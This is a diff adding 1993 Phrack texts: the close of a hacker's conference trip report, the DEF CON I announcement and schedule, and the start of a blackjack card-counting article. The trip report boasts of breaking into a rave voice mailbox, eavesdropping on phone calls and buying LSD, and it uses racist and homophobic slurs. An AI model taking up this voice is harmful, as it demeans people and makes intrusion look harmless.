+day.  They let them stay, but told them next time to either make better
+forgeries or send in their scholarship applications like everyone else.
+
+As lunch drew to a close, the crowd grew restless.  A cry rang out,
+"CLIFFIE!"  The crowd took up the cry, and executives began throwing
+conference papers in the air, stomping their feet and holding up
+their lit cigarette lighters.  "We want Cliffie, we want Cliffie!"
+The house lights dimmed and a silhouette of frazzled hair appeared at the
+head of the room.
+
+Well, maybe it wasn't quite like that.  Cliff Stoll took the stand and
+began a stream of consciousness rant that would make someone with a bipolar
+disorder look lucid.  Contorting himself and leaping on tables, Cliff
+definitely got my attention.  It was kind of like watching Emo Philips
+on crank while tripping.  I dug it.  If you have the opportunity
+to catch Cliff on his next tour, make sure to do so.  Lorne Michaels could
+do worse than make some kind of sitcom around this guy.  It was
+probably the most amazing thing I had seen at the official conference.
+
+11. A Little Bit O' History
+
+Fitzgerald heard that there was a Pac Bell museum downtown.  This news
+evoked a Pavlovian response almost as pronounced as me at The Bridge.
+Me and The Pilot wanted to check it out too so we decided to go.
+It was like the Warner Bros. cartoon of the big dog and the little dog
+"huh Spike, we gonna get us a cat, aren't we Spike, yep, we are gonna get
+that cat, boy, aren't we Spike, yep, yep, boy I can't wait, boy is that
+darn cat gonna be sorry, isn't he Spike, huh, Spike, huh?"  Fitzgerald
+was psyched.
+
+Driving through downtown San Francisco was kind of like some kind of
+deranged Nientendo game.  The streets were obviously layed out by farm
+animals.  Traffic was disgusting.  Of course, 3:30 on Friday afternoon
+is official road construction time in downtown San Francisco.  That was
+not in my "Welcome To SF" guide, so I penciled it in.
+
+About 4:00 we found an open lot, amazingly enough across from the
+Pac Bell building.  We paid roughly 37 thousand dollars for the spot and
+took off to the museum.  Fitzgerald was in heaven.  He had called the
+museum from the hotel before we left and told them we were on our way.
+
+Upon walking in the building we were stopped by a guard.  He asked us what
+we wanted.  Fitzgerald said, "We're here for to see the museum!"  The
+guard gave us the once over and said, "Museum's closed."  Fitzgerald
+almost fainted.  Sure enough, the museum guy had bailed early.  Probably
+immediately after receiving our phone call.  Typical telco nazi antics.
+
+We took to the streets.  (The streets of San Francisco...haha)  Wandering
+up and down the hills checking people out proved quite fun.  We checked out
+Chinatown where we all decided that the little Oriental schoolgirls in their
+uniforms were quite amazing.  We tried to spot the opium dens, and pointed
+out suspect organized crime figures.  Suddenly, we realized we were lost,
+and if we didn't get back to the lot we would lose our car.  (Thirty-seven
+thousand dollars only buys you a spot for a few hours.)  We managed to
+find our car minutes before the tow trucks rolled in and spent
+a few more hours looking for buildings with good dumpsters for that night's
+planned trashing spree.  We found a few spots and took off towards the
+hotel and dinner.
+
+12. Zen & The Art of Trashing
+
+That night everyone decided to move into our room.  Somehow Fitzgerald stole
+a bed and wheeled it into our room to allow for more sleep space.  So, it was
+X-con, Fitzgerald, me, Fender and Mr. Blast all smashed into the little
+room.  As we were sitting in the room discussing what to do that
+evening, the door burst open and a large man in basketball sweats walked
+in.  After he saw us in the room he turned around and quickly exited.
+
+Fitzgerald ran out in the hall after him and discovered that the whole hall
+was full of basketball players.  We called down to the front desk to complain
+that our room had been given out.  The desk apologized and told us that the
+mistake had been noticed and they would correct the problem with the
+basketball team.  This did not exactly sit well with me, as I envisioned
+shitloads of jocks rooting through our stuff, taking my camera and
+various and sundry electronics gear.
+
+Temporarily forgetting about the impending robberies, we took off to do
+a little recon of our own.  The five of us and The Pilot piled into
+two cars and took off towards downtown looking for garbage.
+
+We found several Pac Bell offices but the only one with any type of
+dumpster had nothing to offer save old yellow pages and pizza boxes.
+We were totally bummed.  We decided to wander around aimlessly
+to see what we could stumble across.
+
+After making about a dozen turns and walking a mile or two we came across
+a huge black beast of a building.  It looked like the Borg Cube.  It was
+vast and foreboding.  It was an AT&T building.  Fitzgerald took off
+towards the door to ask for a tour.  It was only 11:00 in the evening,
+so we were certain that we would be given a hearty welcoming and
+guided journey through the bowels of the cube.  Yeah, right.
+
+Alas, we were not to be assimilated.  The guard told us to get lost.
+We decided to see the Borg used dumpsters.  Around the back end of the
+building by the loading docks we saw several stair landings starting about
+three floors up.  We debated scaling the building, but noticed about
+500 security cameras.  This place was possibly the most secure telco
+installation we had ever seen.
+
+We decided that this place must be the point of presence for the West Coast
+since it was just so damn impenetrable.  As we turned to leave I noticed a
+small piece of white cord on the ground.  As I picked it up, we noticed it
+led from a small construction shack behind the POP.  It ran all the way
+from the shack to a heavy steel door in the side of the cube where it
+snaked its way under the door into the building and probably into the
+frame.  We all had a great laugh at the exposed line, and wished we
+would have had a test-set to make a few choice overseas calls.
+
+We wandered back to the cars and ended up driving around downtown some
+more for a few hours before ending up back at the hotel.
+
+13.  Mr. Blast Can't Drive.
+
+We all regrouped the next morning to go shopping downtown.  Fender was kind
+enough to dish out vast quantities of chocolate-covered espresso beans
+and we all got completely wired.  X-con and I decided that we should have had
+a bag of these the previous morning.
+
+We drove straight down to Chinatown and began looking for a place to park.
+Mr. Blast, Fender, X-con were in one car, me, Fitzgerald and The Pilot
+in another.  Mr. Blast, for being from a huge city, had absolutely no
+concept of driving in traffic in a downtown setting.  He missed lots,
+made weird turns, ran lights and generally seemed like he was trying
+to lose us.  He achieved his desired goal.
+
+We cursed his name for fifteen minutes and then gave up our search.
+Fitzgerald had swiped Fender's scanner and was busily entertaining
+himself listening to cellular phone calls.  He had the window rolled down
+in the back seat and took great joy in holding up the scanner so people
+walking down the street could join in on the voyeuristic fun.  Suddenly
+Fitzgerald shouted, "HOLY SHIT!  I can't believe it!"
+
+The Pilot and I nearly had matching strokes, "WHAT?" I said.  "It's
+ENCRYPTED!  I can't believe it man, encrypted speech on the phone!"
+I began to laugh, and The Pilot soon joined in.  It was Mandarin.
+"Where the hell are we, Fitz?"  I asked him.  "San Francisco, " he replied.
+"No," I said, "Specifically, where in San Francisco?"  Fitzgerald
+thought for a minute and said, "Uh, Chinatown?"  Suddenly, his eyes
+lit up, "OHHHHHHH.  Hehe..  it's not encrypted is it?"  We laughed at him
+for about ten minutes.
+
+We came to a stop light where a very confused Chinese lady was looking
+at us.  Fitzgerald held up the scanner and I yelled, "Herro!"  We
+went hysterical as we drove off, leaving the woman even more bewildered.
+
+We found a place to park and decided to explore on our own.  The plethora
+of little Chinese hotties blew my mind.  We staggered around Chinatown
+trying to get bargains on electronics gear.  It struck us all as odd
+that every electronics store in the downtown area was owned and
+operated by Iranians.  Needless to say, no bargains were found.
+
+We had lunch at a restaurant called Red Dragon.  The majority of the
+lunch was spent talking telco.  Watching Fitz and The Pilot get totally
+wrapped up in the talk, both trying to tell the best story about the
+neatest hack proved incredibly interesting.
+
+We took off into the crowds to try to find cheap watches, since The Pilot's
+watch was ready to retire.  He soon made a totally sweet deal on a watch
+from an oriental merchant and we took off for the car.  On the way we noticed
+a small shop in a back alley with throwing stars in the window.
+
+Inside was ninja heaven.  They had daggers, cloaks, stars, nunchaca,
+swords, masks and tons and tons of violence inducing paraphanalia.  I saw
+a telescoping steel whip behind a case.  I knew I must possess this item,
+and when I found out that it was only $22.00 the money was already in
+my hands.  Fitz also got a whip and five stars.  We were now armed...Phiber
+beware.
+
+We took off down to the port to look out at the bay.  While we were there
+we watched a bunch of skaters doing totally insane street style in a small
+cement fountain area.  One kid waxed the street with his face and we all
+had a serious laugh, much to the chagrin of the injured and his posse.
+As soon as they scraped up the hapless skatepunk off the ground,
+they resumed their thrashing, avoiding the wet spot.  We decided
+that these kids were totally insane.
+
+We took off back to the hotel to meet up with the idiots.  Once we arrived
+we found that we were locked out of our room.  In fact, not only had they
+cut off our keys, but they had checked us out.  We got a security guard
+to let us in the room.  Shortly thereafter X-con et.al. returned loaded
+with gear they had picked up on their trip.  They exclaimed that they
+rushed back to the hotel at top speed, since when they tried to call the
+room, the hotel had said that our room was not in use.
+
+I got furious and went downstairs to yell.  Eventually, we got our phone
+service back and the manager went upstairs to give us a live body to
+verbally abuse, which we took full advantage of.  He shucked and jived
+his way through an apology but we did not get a free night as we had
+hoped for.
+
+14. Castro-Bound
+
+X-Con wanted shoes.   We all sorted out the card key mess and piled back in
+The Pilot's car and headed out to find NaNa's.  As we drove towards
+the store we noticed something change about the city.  The fog lifted.
+The colors got more pastel.  The men walking down the street seemed to
+have more spring in their step.  We had entered the Castro.
+
+I really wanted to hit a record store in the Castro because homos always
+seem to have cool dance music.  I convinced everyone that we should pull
+over and risk a quick walk down the main drag.
+
+The stroll was a complete farce.  Our crew seemed to be extremely
+apprehensive.  To make them more edgy I took great glee in talking
+real nelly and batting my eyes at anything that moved.  No one was amused.
+In fact, Fitzgerald and the Pilot looked like they wanted to cry and run
+back to the car and hide.
+
+None of the record stores had anything good.  There were lots of old
+Judy Garland and Ethyl Merman but nothing more modern than the
+Village People.  (And I was expecting techno.  But noooooo...)
+
+On our way back to the car we passed by a leather goods store.  Not
+exactly Tandycraft, if you get my drift.  X-con was the only one
+brave enough to go in.  He came out looking drained of all color holding
+a catalog.
+
+"There were these three guys in there," he stammered.  "One of them was
+being fitted for a cock sheath.  The two other guys kept showing him
+different ones, but he said they were too big."
+
+We all shuddered and hastened our return to the car.
+
+We drove a few miles more down the street and ended up at the NaNa's shop.
+The store was your typical alternative grunge-wear shop.  Stompin'
+boots, nifty caps, shirts by Blunt.  X-con got his shoes.  We all got
+nifty caps.  Leaving for the hotel, I grabbed a handful of flyers from
+the front window.  Most were rave flyers for the next weekend.  One however
+was announcing a bondage party for 'women only' two days later.  I felt a
+tear begin to form as I reminisced about the Bridge.
+
+15. Hating It In The Height.
+
+We regrouped back at the hotel and took off again for the Height to go
+check out Rough Trade records and see what could be seen.  And X-con
+and I needed a few tabs.  (YEEE!)  We needed these rather badly since
+Mr. Blast had found out about a rave that evening from the SF-RAVES
+mailing list.  There was no way X-con and I could sit through a rave
+sober, and dancing was WAY out of the question.
+
+Rough Trade was closed.
+
+We decided to grab a quick bite to eat while waiting for information
+on the rave.  We decided to try something really odd, since we weren't in
+for the typical corporate burger scene.  A bit down the street from
+Rough Trade we happened upon a Ethopian restaurant.  Since this was about
+as obscure as any of us had ever dreamed, we decided to check it out.
+I personally didn't think Ethopians ever had any food, and made a few jokes
+about wanting something light, so this would definitely be the place.
+
+Ethopian food was odd.  Looking over the menu, Mr. Blast decided that
+he didn't want much of anything they had to offer.  We decided that we
+should buy a lot of everything and just pick and choose.  I made the
+comment that I would only eat chicken, and Mr. Blast didn't like the
+idea of eating much of anything everyone wanted to try.  We ordered
+separately.
+
+The food came out in a rather odd fashion.  Everything was piled on top
+of everything else.  It was all splattered on top of a weird pancake-like
+sponge bread.  There were all manner of sauces to smother, dip, or otherwise
+destroy the entrees with, so we all took great bravado in our sampling of
+each.  It was quite a fantastic spread, and I wholeheartedly urge everyone
+to check out this particular cuisine.
+
+After the meal we took off to find a phone to call the raveline.  On our
+way to the phone X-con and I stumbled across a few transients who offered
+us acid at a remarkable price.  This was almost too good to be true.
+We slunk down a side street and bs'ed with the homeless couple as we
+decided how many to buy.  We settled on 20 hits for 45 dollars.  X-con
+and I were psyched.  The rave would indeed be tolerable.
+
+We hooked up with the crew, smiling like Cheshire cats.  Mr. Blast had
+the directions to the rave so we took off ready to overindulge.
+By the time we reached the rave, we were one of what seemed like
+a hundred or two hanging outside of a warehouse.  This might be
+pretty damn cool.  X-con and I began our dosing.
+
+Now, usually I love the first contact of the blotter with my tongue.
+It evokes a certain tangy taste, akin to touching a battery to the tip
+of your tongue.  It always gets the adrenaline flowing, and brings
+back memories of what will soon be repeated.
+
+Nothing.
+
+I looked at X-con.  "Dude," he said, "I can't taste shit.  I better
+take more."  He dropped about 3 more.  Still no taste.  I ate a few more
+myself in a futile hope that some lysergine substance may have once resided
+in the fibers of the blotter.  Nope.
+
+This was the beginning.
+
+As we waited to be let in to the warehouse, cursing the transients, the sirens
+begin to wail.  Fucking great.  Five police cars swept into the cul-de-sac
+that led to the warehouse.  The rave would not be in this location.  Everyone
+bailed like rats from a sinking ship, yelling that the rave would be
+moved to a soon to be announced location.
+
+Now X-con and I were really pissed.  I whipped out my steel whip and said,
+"Let's go pay a quick visit to the Height and visit our friends."
+We piled back into the cars and set out to do some serious damage.
+
+Arriving in the Height we noticed that cops were everywhere.  This was not
+going to be easy.  X-con and I set out like men possessed.  The transients
+were gone.  We wandered up and down the street for about 30 minutes looking
+for our prey.  Finally we saw them.  They saw us.  One ran like a marathon
+sprinter.  The other stayed, but was soon flanked by a gang of eight
+other transients.  X-con walked right up and said "You fucking ripped us
+off!"
+
+As we tried to get either our money back or working drugs, more and more
+transients gathered.  It was time to write it off as a loss.  We cursed
+and backed away from the crowd.
+
+Our group had congregated at a grocery store at the end of the street.
+Mr. Blast was speed dialing the raveline in a desperate attempt to
+find a venue to spin wildly in and blow his day-glo rave whistle.
+
+Across the street, a homeless black man screamed painfully at each and
+every passing car, "HELP!  You gotta take me and my girlfriend to
+the hospital now!  She's gonna DIE!"  He staggered over to us
+and begged for a ride, we respectfully declined.
+
+As this was going on, the grocery store erupted with violence as
+a drunken frat type was ejected forcibly.  He started swinging
+wildly at the rent-a-cop, and was greeted with the business end
+of a police baton.
+
+The Pilot decided this was a good time to make his exit.  He waved
+goodbye and was gone.
+
+RBOC, Voxman and a nameless waif arrived in the parking lot.  We
+told them the status of the rave and they decided to wait to see if
+there may be any type of decadence forthcoming.  About that time
+Mr. Blast came screaming across the lot with the directions.
+
+We no longer had room for everyone, so Voxman & the nameless waif were
+offered a ride from a flaming pedophile who overheard their plight.
+The took him up on his offer before we could stop them.  We said a quick
+prayer for them and piled into the car.
+
+16. Stark Raving Mad Late Into The Night
+
+The new location was out at a marina in Berkeley on the beach.  It took damn
+near an enternity to get there and when we arrived it was raining.
+X-con and I made it our mission to find acid at this location.  The music
+could be heard for several hundred yards from the street, so we took off
+in a sprint towards the source.
+
+There were roughly 40 or so people.  Thirty-nine guys, one ugly girl.
+
+X-con immediately disappeared in the crowd looking for someone with
+a beeper...anyone.  Fender disappeared.  Fitz disappeared.  RBOC and I
+sat and made rude comments.  X-con arrived back with a big smile.
+
+Our saviour was in the form of a teenage Hispanic dude.  He had red blotter
+with elephant, and yellow blotter with some other kind of design.  The
+yellow was "three-way."  We bought several of each, and there was much
+rejoicing.  X-con had already eaten one three-way and one regular, before
+I could split one in half for RBOC.  The taste was overwhelming.
+Freshly squeezed.
+
+The three of us perched up on a hill staring out over the undulating mass
+waiting for the effect.  It came quickly.
+
+As it hit, Fitz wandered up and said, "Let's hack the raveline!"
+This idea went over VERY WELL, so we all set out towards the car, leaving
+little sparky streamers behind us as we moved.
+
+From a nearby hotel lobby, Fitz and X-con busily hacked at the VMB
+while RBOC and I sat in the car totally wigging.  About 30 minutes
+later they ran out screaming.  It had been done and the code was
+now 902100.
+
+We drove back to the rave and noticed the red and blues flashing and the
+ravers bailing en masse.  We picked up Mr. Blast and Fender and took off
+back to our hotel.  Fender had done a bit of networking at the rave and
+exchanged a few business cards.  We were totally appalled.
+
+Once back at the hotel X-con took even more.  He said he wanted to see
+static.  Within an hour he achieved his goal.  He spent a large portion of
+the night walking in and out of the room muttering, "Man...you guys are
+totally fucking with me."
+
+We then decided to spice up the raveline.  RBOC changed the outgoing
+message a few times and then finally decided on, "HAR HAR HAR, Y'all been
+boarded by the pirate!  No more techno!  No more homosexuals
+grinding away at 120 beats per minute!  No more Rave!  HAR HAR HAR!"
+We laughed like schoolgirls.
+
+Everyone passed out.  Everyone but us tripsters of course.  We stayed up
+the majority of the night telling really odd pharmaceutical war stories.
+
+At about 6 am RBOC decided that he was hungry and called for room service.
+He ordered linguini.  The room service clerk told him that the kitchen
+was not ready for dinner, and would only be serving breakfast.  RBOC
+replied, "Look, do you have noodles?  Yes?  Do you have water?  Well,
+what's the fucking problem.  What exactly do you need to boil water?
+Turn on the stove, and I'll be down in a few minutes to make it myself."
+With this logic, the room service clerk replied his linguini would
+be up in about half an hour.
+
+We then decided to get escorts, or at least order up a few, and listen
+to them on their cell phones calling their pimps.  (Fender had listened
+to about five different such conversations a few nights prior.)
+RBOC ordered up a couple of buxom blondes to go and we waited for their
+return phone call to barter on the price.
+
+The call never came in.  The hotel had turned off our phone for incoming
+calls.  This sparked even more fun, as RBOC called up the front desk
+to complain, "Look ma'am, my hookers can't fucking call into my room!
+Turn my phone back on NOW!  I've had a rough night up for 24 hours on
+drugs, and I need a woman."  The operator was not amused.
+
+The sun rose.  We all remarked about the typical morning after layer of
+filth that seems to congeal after a good fry.  The static was no longer
+visible to X-con and he became almost lucid again, interjecting bits
+of wisdom like "Uh" and "Yeah" into the conversation.  His flight was in
+two hours.
+
+The linguini arrived and everyone had a small taste as the smell of
+the white sauce permeated the room.  As we smacked away, the inexperienced
+of the crowd arose to greet a new morning.  RBOC suddenly realized that
+NYC was probably snowed under, so he took off to find a phone to check
+on the status of his flight home.
+
+X-con gathered his bags and mumbled "Later," and disappeared.  I fell on the
+bed and disappeared into darkness.
+
+17. Laterz
+
+The alarm clock blared out a sickening beep, to which it was rewarded with
+a small flight across the hotel room.  I gathered up my gear and made a
+beeline towards the elevator.
+
+Still confused, I wandered down to the lobby where I was greeted by
+Fitzgerald and Fender.  I bid them both a fond farewell and boarded
+the airport shuttle.  This was one hell of a good time.  I wonder if
+CFP4 in Chicago will be as good?  One can only hope.  See you there.
+
+
+***************************************************************************
+
+                  D E F  C O N  I   C O N V E N T I O N
+                  D E F  C O N  I   C O N V E N T I O N
+                          DEF CON I CONVENTION
+                  D E F  C O N  I   C O N V E N T I O N
+
+>> READ AND DISTRIBUTE AND READ AND DISTRIBUTE AND READ AND DISTRIBUTE <<
+
+
+                    Finalized Announcement: 5/08/1993
+
+              We are proud to announce the 1st annual Def Con.
+
+    If you are at all familiar with any of the previous Con's, then you
+will have a good idea of what DEF CON I will be like. If you don't have any
+experience with Con's, they are an event on the order of a pilgrimage to
+Mecca for the underground. They are a mind-blowing orgy of information
+exchange, viewpoints, speeches, education, enlightenment... And most of all
+sheer, unchecked PARTYING. It is an event that you must experience at least
+once in your lifetime.
+
+    The partying aside, it is a wonderful opportunity to met some of the
+celebrities of the underground computer scene. And those that shape its
+destiny - the lawyers, libertarians, and most of all the other There will
+be plenty of open-ended discussion on security, telephones and other
+topics. As well as what TIME magazine calls the "Cyberpunk Movement".
+
+    Las Vegas, is as you might have guessed a great choice for the Con.
+Gambling, loads of hotels and facilities, cheap air fare and room rates.
+It's also in the West Coast making it more available to a different crowd
+than the former Cons have been.
+
+Your foray into the scene and your life will be forever incomplete
+if by some chance you miss out on DEF CON I. Plan to be there!
+
+
+WHO:   You know who you are.
+WHAT:  Super Blowout Party Fest, with Speakers and Activities.
+WHERE: Las Vegas, Nevada
+WHEN:  July 9th, 10th and 11th (Fri, Sat, Sun) 1993
+WHY:   To meet all the other people out there you've been talking to for
+       months and months, and get some solid information instead of rumors.
+
+
+DESCRIPTION:
+
+     So your bored, and have never gone to a convention?  You want to meet
+all the other members of the so called 'computer underground'?  You've been
+calling BBS systems for a long time now, and you definitely have been
+interacting on the national networks.  You've bullshitted with the best,
+and now it's time to meet them in Vegas!  For me I've been networking for
+years, and now I'll get a chance to meet everyone in the flesh.  Get
+together with a group of your friends and make the journey.
+
+     We cordially invite all hackers/phreaks, techno-rats, programmers,
+writers, activists, lawyers, philosophers, politicians, security officials,
+cyberpunks and all network sysops and users to attend.
+
+     DEF CON I will be over the weekend in the middle of down town Las
+Vegas at the Sands Hotel.  Why Las Vegas?  Well the West Coast hasn't had
+a  good Convention that I can remember, and Las Vegas is the place to do it.
+Cheap food, alcohol, lots of entertainment and, like us, it never sleeps.
+We will have a convention room open 24 hours so everyone can meet and plan
+and scheme till they pass out.  Events and speakers will be there to provide
+distraction and some actual information and experiences from this loosely
+knit community.
+
+        This is an initial announcement.  It is meant only to alert you to
+the time, dates and location of the convention.  Future announcements will
+inform you about specific speakers and events.
+
+        An information pack is FTPable off of the internet at nwnexus.wa.com,
+in the cd/pub/dtangent directory. The IP# is 192.135.191.1  Information
+updates will be posted there in the future as well as scanned map images and
+updated speaker lists.
+
+FINAL NOTES:
+
+        COST:  How you get there is up to you, but United Airlines will be
+the official carrier (meaning if you fly you get a 5% to 10% price reduction
+off the cheapest available fare at the time of ticket purchase)  When buying
+airline tickets, call 1-800-521-4041 and reference meeting ID# 540ii.  Hotel
+Rooms will cost $62 per night for a double occupancy room.  Get your friends
+together and split the cost to $31.  Food is inexpensive.  The entertainment
+is free inside the hotel.  Reference the DEF CON I convention when
+registering, as we have a block of rooms locked out, but once they go it will
+be first come, fist serve.  Call 1-800-634-6901 for the reservations desk.
+
+        The convention itself will cost $30 at the door, or $15 in advance.
+It pays to register in advance! Also it helps us plan and cover expenses!
+Mail checks/money orders/cashiers checks to: DEF CON I, 2709 East Madison
+Street, #102, Seattle, WA, 98112.  Make them payable to: "DEF CON" we're not
+trying to make money, we will be trying to cover costs of the conference room
+and hotel plus air fair for the speakers who require it.  Don't bother mailing
+it a week in advance, that just won't happen.  Advanced registration gets you
+a groovy 24 bit color pre-generated name tag.  Include with your payment the
+name you want listed, your association/group affiliation/bbs/whatever, email
+address, and/or bbs number for syops.  Last day for the registrations to reach
+me will be July 1st.
+
+        SPEAKERS:  We have solicited speakers from all aspects of the
+computer underground and associated culture (Law, Media, Software Companies,
+Cracking Groups, Hacking Groups, Magazine Editors, Etc.)  If you know of
+someone interested in speaking on a self selected topic, please contact The
+Dark Tangent to discuss it.
+
+FOR MORE INFORMATION:
+
+        For initial comments, requests for more information, information
+about speaking at the event, or maps to the section where prostitution is
+legal outside Las Vegas (Just Kidding) Contact The Dark Tangent by leaving
+me mail at: dtangent@dtangent.wa.com on the InterNet.
+
+Or call: 0-700-TANGENT for conference information/updates and to leave
+         questions or comments.
+Or Snail Mail (U.S. Postal Service) it to DEF CON, 2709 East Madison Street,
+#102, Seattle, WA, 98112.
+
+Future information updates will pertain to the speaking agenda.
+
+------------------------------------------------------------------------------
+Updates since the last announcement:
+
+>> The Secret Service is too busy to attend.
+>> New Media Magazine, Unix World and Robert X. Cringly have stated they will
+   attend.
+>> We got a voice mail system working (I think) for comments and questions.
+>> We don't have enough $$$ to fly out the EFF or Phillip Zimmerman (Author
+   of PGP) or Loyd Blankenship.
+>> Judy Clark will be representing the CPSR and a few other organizations
+
+Don't forget to bring a poster / banner representing any of the groups you
+belong to.  I want to cover the conference room walls with a display of all
+the various groups / people attending.  (Break out the crayons and markers)
+
+------------------------------------------------------------------------------
+
+
+
+     DEF CON I CONVENTION  [PROPOSED SPEAKING SCHEDULE UPDATED 5.31.1993]
+
+             Saturday the 10th of July 10am, Sands Hotel, Las Vegas
+
+
+
+         INTRODUCTION       Welcome to the convention
+                            *The Dark Tangent (CON Organizer)
+
+      Keynote speaker       Cyberspace, Society, crime and the future.
+
+                            To hack or not to hack, that is not the question
+                            *Ray Kaplan
+
+   Civil Libertarians
+                -CPSR       Computer Privacy/1st Amendment/Encryption
+                            Gender Rolls and Discrimination
+                            *Judi Clark
+
+       -USC Comp. Law       Legalities of BBS Operation, message content
+                            laws and network concerns.
+                            *Allen Grogan, Editor of Computer Lawyer
+
+     'The Underworld'
+          -Networking       Concerns of National Networking
+                            of CCi (Cyber Crime International) Network.
+                            *Midnight Sorrow.
+
+         Corporations
+    -Packet Switching
+               SPRINT       Concerns/security and the future
+                  MCI       of packet switching.
+                            (*Jim Black, MCI Systems Integrity)
+
+
+                 Misc       Common misbeliefs and rumors of the underground
+                            *Scott Simpson
+
+     -Virtual Reality       The law, and it's intersection with VR
+                            *Karnow
+
+       -Unix Security      Future developments in unix security software,
+                           General Q&A on unix security
+                           *Dan Farmer
+
+-System Administrator       Security Concerns of an Administrator
+                            *Terminus
+
+     The 'Underworld'
+            -Internet       The security problems with Internet/Networks
+                            Overview of hacking
+                            *Dark Druid
+
+      -Getting Busted       The process of getting "busted"
+                            *Count Zero
+
+  -How to be a nobody       Hiding your identity in the high-tech future, or
+                            The payphone is your friend.
+                            *TBA-nonymous
+
+     -The Prosecutors       Their concerns/problems and
+       Hacker Hunters       suggestions for the 'underworld'/Q&A
+
+           CONCLUSION       General Q&A
+
+
+This itinerary is proposed, and topics and speakers will be marked as
+permanent once a confirmation is received.  This is by no means the exact
+format of DEF CON I.  Any Questions / Comments Contact:
+
+dtangent@dtangent.wa.com
+Voice Mail 0-700-TANGENT
+------------------------------------------------------------------------------
+[>             DEF CON I and United Airlines Travel Arrangements             <]
+
+
+        United Airlines has been chosen as the official carrier for DEF CON I
+and is pleased to offer a 10% discount off the unrestricted BUA coach fare or
+a 5% discount off the lowest applicable fares, including first class.  This
+special offer is available only to attendees of this meeting, and applies to
+travel on domestic segments of all United Airlines and United Express flights.
+A 5% discount off any fare is also available for attendees traveling to or from
+Canada in conjunction with your meeting.  These fares are available through
+United's Meeting Desk with all fare rules and restrictions applying.
+
+        Help support the DEF CON I Conference by securing your reservations
+with United Airlines.  To obtain the best fares or schedule information,
+please call United's Specialized Meeting Reservations Center at 1-800-521-4041.
+Dedicated reservationists are on duty 7 days a week from 7:00 a.m. to 1:00 a.m.
+ET.  Please be sure to reference ID number 540II.  You or your travel agent
+should call today as seats may be limited.
+
+        As a United Meeting attendee you qualify for special discount rates
+on Hertz rental cars.  Mileage Plus members receive full credit for all miles
+flown to this meeting.
+
+        Tickets will be mailed by United or you can pick them up at your
+local travel agency or United Airlines ticket office.
+
+
+
+Generic update #1---
+
+My system exploded, so it's been hard to keep in touch with everyone,
+but my mail response should be better now.  Yep the conference is
+still on.  A blown hard drive won't kill me.  You can reach me for
+information or questions at 0-700-TANGENT (the DEF CON I hot line)
+
+-----
+
+
+--
+Sorry for the huge signature, but I like privacy on sensitive matters.
+-----BEGIN PGP PUBLIC KEY BLOCK-----
+Version: 2.2
+
+mQCNAiviMB8AAAEEANO4XmnggG8h8XWtfxShMvRUarlpj2OBSPMrzUNRAKEjupUj
+f/FfszMk0G60GSiCfiosw/m2JcKPQ6OZgQCxfElFUcYkKx/rYjgU3viEmNasjAwN
+jR/9l0WSXlv4CjCUtH/t4rm1C1bs8i6iznmu/dCeuUEZQoRm0Lrdt/10TGt3AAUT
+tCtUaGUgRGFyayBUYW5nZW50IDxkdGFuZ2VudEBkdGFuZ2VudC53YS5jb20+
+=DxKN
+-----END PGP PUBLIC KEY BLOCK-----
\ No newline at end of file
diff --git a/phrack43/9.txt b/phrack43/9.txt
new file mode 100644
index 0000000..7498627
--- /dev/null
+++ b/phrack43/9.txt
@@ -0,0 +1,898 @@
+                              ==Phrack Magazine==
+
+                 Volume Four, Issue Forty-Three, File 9 of 27
+
+                            How to "Hack" BlackJack
+                                      By
+                                  Lex Luthor
+                                     and
+                         The Legion of Gamblerz!! (LOG)
+                 lex@mindvox.phantom.com (or) lex@stormking.com
+
+                               Part 1 of 2 (50K)
+
+
+BLURB:
+"I learned a lot of things I didn't know from Lex's File" ---Bruce Sterling
+
+
+Introduction:
+-------------
+
+   With the DEF CON 1 hacker/cyberpunk/law enforcement/security/etc convention
+coming up in Las Vegas, Nevada on July 9-12 1993, I felt that now would be a
+good time to write a "phile" on something the attendants could put to use to
+help legally defray the costs of going. The thought of a bunch of ex-hackers
+running around Las Vegas without shirts (having 'lost' them in the various
+Casinos) frightened me into immediate action. Besides, I don't write articles
+on 'Underground' topics anymore and since I have done a lot of research and
+playing of Casino BlackJack, the CON in Vegas provided me the perfect excuse
+to finally write an article for PHRACK (not withstanding the pro-phile in
+Issue 40 which doesn't really count).
+
+   Regardless of whether you go to this DEF CON 1 thing, if you ever plan to
+hit a casino with the purpose of MAKING MONEY, then you really should
+concentrate on ONE game of chance: BlackJack. Why? Because BlackJack is the
+*ONLY* casino game that affords the educated and skilled player a long-term
+mathematical advantage over the house. All the other casino games: Craps,
+Roulette, Slots, etc. have the long-term mathematical advantage over the
+player (see table below). BlackJack is also the only casino game for which the
+odds are always changing. Don't be fooled by all the glitter, a casino is a
+business and must make a profit to survive. The profit is ensured by using a
+set of rules which provides them with an edge. Now you say: wait a sec, how do
+they make money if BlackJack can be beaten? There are a couple of reasons. One
+reason is that there are very few good players who make it their profession to
+beat casinos at BlackJack day in and day out. There are many more who THINK
+they are good, THINK they know how to play the game, and lose more money than
+the really good players win. Notwithstanding the throngs of vacationers who
+admit to not being well versed in the game and consequently are doomed to
+lose...plenty. Another reason is that if a casino thinks you are a "counter"
+(a term just as nasty as "phreaker" to the phone company) there is a good
+chance that they will ask you to leave. See the section on Social Engineering
+the Casino to avoid being spotted as a counter. Also, the house secures its
+advantage in BlackJack from the fact that the player has to act first. If you
+bust, the dealer wins your bet regardless of whether the dealer busts later.
+
+   The following table illustrates my point regarding house advantages for the
+various casino games and BlackJack strategies. The data is available in most
+books on casino gambling. Note that negative percentages denote player
+disadvantages and are therefore house advantages.
+
+   --------------------------------------------------------------------------
+   GAME                             Your Advantage (over the long run)
+   --------------------------------------------------------------------------
+   Craps                            -1.4 % overall average
+   Baccarat                         -1.1 % to -5.0 %
+   Roulette                         -2.7 % to -5.26 %
+   Slots                            -2.5 to -25 % depending on machine setting
+   Keno                             -25 % more or less
+
+   BlackJack (WAG Player)           -2 % to -15 %
+   BlackJack (Mirror Dealer)        -5.7 %
+   BlackJack (Basic Strategy)       -0.2 % to +0.3 %
+   BlackJack (Basic Strategy &      Up to +3.1 % depending on card counting
+              Card Counting)        system and betting range.
+
+   A -2 % player advantage (2 percent disadvantage) means that if you play a
+hundred hands at a dollar each, then ON AVERAGE, you will lose two dollars.
+Note that the typical "pick three" State Lottery game is a disaster as your
+advantage is -50 %. If you make 1000 $1 bets, you will lose $500 on average.
+Some people say that state lotteries are taxation on the stupid...
+
+   This article contains thirteen sections. It was written in a fairly modular
+fashion so if there are sections which do not interest you, you may omit them
+without much loss in continuity however, all the sections are networked to
+some degree. For the sake of completeness, a fairly comprehensive list of
